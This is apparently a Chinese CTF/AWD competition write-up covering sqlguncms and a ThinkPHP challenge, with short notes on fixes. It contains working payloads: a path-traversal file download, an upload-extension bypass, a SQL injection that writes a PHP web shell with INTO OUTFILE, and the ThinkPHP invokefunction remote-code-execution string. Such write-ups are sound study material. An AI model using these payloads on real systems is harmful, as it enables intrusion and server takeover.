Background

题目皆来源于线下,这里面简单说一下漏洞利用方式和修复方式吧

sqlguncms

白盒能够看到后台/sqlgunadmin/login.php
账号admin admin即可
B372EABB-4464-48AD-B09F-FF232097E52E.png
正常其实修改密码就行,但是好像这个模块没给
其实比赛的时候如果有sql直接改数据库就好啦
看一看登录框这个点
E88A0891-87FB-4F27-A662-7F0A5FEC145C.png
应该是ban掉空格依然可以万能密码之类的,但是没成功
有下载功能尝试直接下载flag
AE4AA161-9EAC-41EB-BDA4-5E2C9CDB45D4.png
死活下载不了,继续读下源码

  if($_GET["downlog"]=="down")

要get提交,后台给的方式是post
构造payload
downlog.php?downlog=down&filepath=/flag即可
修复也很简单 那我就直接让你只能下载规定的log
81AADE6A-6238-4873-8888-3586FD1E923C.png
发布新闻那里可以上传图片,只是前端验证了
抓包改为php即可
后端也验证下吧
A1CAA070-36AA-4190-A753-F17454A159DF.png
在搜索框这里
3F8BC1C1-ADC5-4863-9E56-8CFC5409836F.png

0%'union select 1,'<?php system('cat /flag');?>',3 into outfile '/var/www/html/1.php' #

Thinkphp

防灾里面的题目

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

rce梭

425BF19B-85A0-4304-807A-B44F7CCBF9B8.png

手动加密出flag

然后.htaccess里面他们留了个解析漏洞
DAFE611A-0433-41DD-9643-EAE00D36ED56.png

后记

这么一看awd不是很难